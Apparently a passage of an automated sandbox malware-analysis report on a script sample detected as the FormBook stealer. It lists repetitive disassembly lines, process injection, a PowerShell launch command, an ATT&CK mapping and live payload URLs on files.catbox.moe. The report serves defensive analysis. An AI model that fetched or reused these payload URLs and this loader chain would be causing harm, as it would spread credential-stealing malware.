Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]	4_2_019AF5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]	4_2_019A45B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]	4_2_019A45B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]	4_2_019A15A9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]	4_2_019A15A9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]	4_2_019A15A9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]	4_2_019A15A9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]	4_2_019A15A9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0B594 mov eax, dword ptr fs:[00000030h]	4_2_01A0B594
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0B594 mov eax, dword ptr fs:[00000030h]	4_2_01A0B594
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A95DA mov eax, dword ptr fs:[00000030h]	4_2_019A95DA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019865D0 mov eax, dword ptr fs:[00000030h]	4_2_019865D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]	4_2_019BA5D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]	4_2_019BA5D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD5D0 mov eax, dword ptr fs:[00000030h]	4_2_019FD5D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD5D0 mov ecx, dword ptr fs:[00000030h]	4_2_019FD5D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]	4_2_019BE5CF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]	4_2_019BE5CF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B55C0 mov eax, dword ptr fs:[00000030h]	4_2_019B55C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A555C9 mov eax, dword ptr fs:[00000030h]	4_2_01A555C9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]	4_2_019A15F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]	4_2_01A535D7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]	4_2_01A535D7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]	4_2_01A535D7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]	4_2_019BC5ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]	4_2_019BC5ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019825E0 mov eax, dword ptr fs:[00000030h]	4_2_019825E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_019AE5E7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]	4_2_01A2F525
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3B52F mov eax, dword ptr fs:[00000030h]	4_2_01A3B52F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55537 mov eax, dword ptr fs:[00000030h]	4_2_01A55537
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B7505 mov eax, dword ptr fs:[00000030h]	4_2_019B7505
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B7505 mov ecx, dword ptr fs:[00000030h]	4_2_019B7505
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]	4_2_019AE53E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]	4_2_019AE53E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]	4_2_019AE53E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]	4_2_019AE53E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]	4_2_019AE53E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]	4_2_01A54500
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BD530 mov eax, dword ptr fs:[00000030h]	4_2_019BD530
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BD530 mov eax, dword ptr fs:[00000030h]	4_2_019BD530
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]	4_2_0198D534
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]	4_2_01988550
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]	4_2_01988550
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BB570 mov eax, dword ptr fs:[00000030h]	4_2_019BB570
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BB570 mov eax, dword ptr fs:[00000030h]	4_2_019BB570
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]	4_2_019B656A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]	4_2_019B656A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]	4_2_019B656A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B562 mov eax, dword ptr fs:[00000030h]	4_2_0197B562
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0A4B0 mov eax, dword ptr fs:[00000030h]	4_2_01A0A4B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B480 mov eax, dword ptr fs:[00000030h]	4_2_0197B480
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01989486 mov eax, dword ptr fs:[00000030h]	4_2_01989486
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01989486 mov eax, dword ptr fs:[00000030h]	4_2_01989486
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B34B0 mov eax, dword ptr fs:[00000030h]	4_2_019B34B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B44B0 mov ecx, dword ptr fs:[00000030h]	4_2_019B44B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019864AB mov eax, dword ptr fs:[00000030h]	4_2_019864AB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A294E0 mov eax, dword ptr fs:[00000030h]	4_2_01A294E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019804E5 mov ecx, dword ptr fs:[00000030h]	4_2_019804E5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A554DB mov eax, dword ptr fs:[00000030h]	4_2_01A554DB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]	4_2_01A06420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A340D mov eax, dword ptr fs:[00000030h]	4_2_019A340D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]	4_2_019B8402
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]	4_2_019B8402
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]	4_2_019B8402
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BA430 mov eax, dword ptr fs:[00000030h]	4_2_019BA430
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197C427 mov eax, dword ptr fs:[00000030h]	4_2_0197C427
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]	4_2_0197E420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]	4_2_0197E420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]	4_2_0197E420
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A245A mov eax, dword ptr fs:[00000030h]	4_2_019A245A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197645D mov eax, dword ptr fs:[00000030h]	4_2_0197645D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]	4_2_0198B440
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]	4_2_019BE443
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A5547F mov eax, dword ptr fs:[00000030h]	4_2_01A5547F

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 108.181.20.35 443

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	32 Scripting	Valid Accounts	1 Exploitation for Client Execution	32 Scripting	211 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TT copy.js	3%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://files.catbox.moe;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
files.catbox.moe	108.181.20.35	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://files.catbox.moe/t7rwbh.txt	false	high
https://files.catbox.moe/ugok5m.ps1	false	high
https://files.catbox.moe/0hc11b.txt	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://files.catbox.moe;	wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/ugok5m.ps1u	wscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/0hc11b.txt%Operation	x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/	wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp	false		high
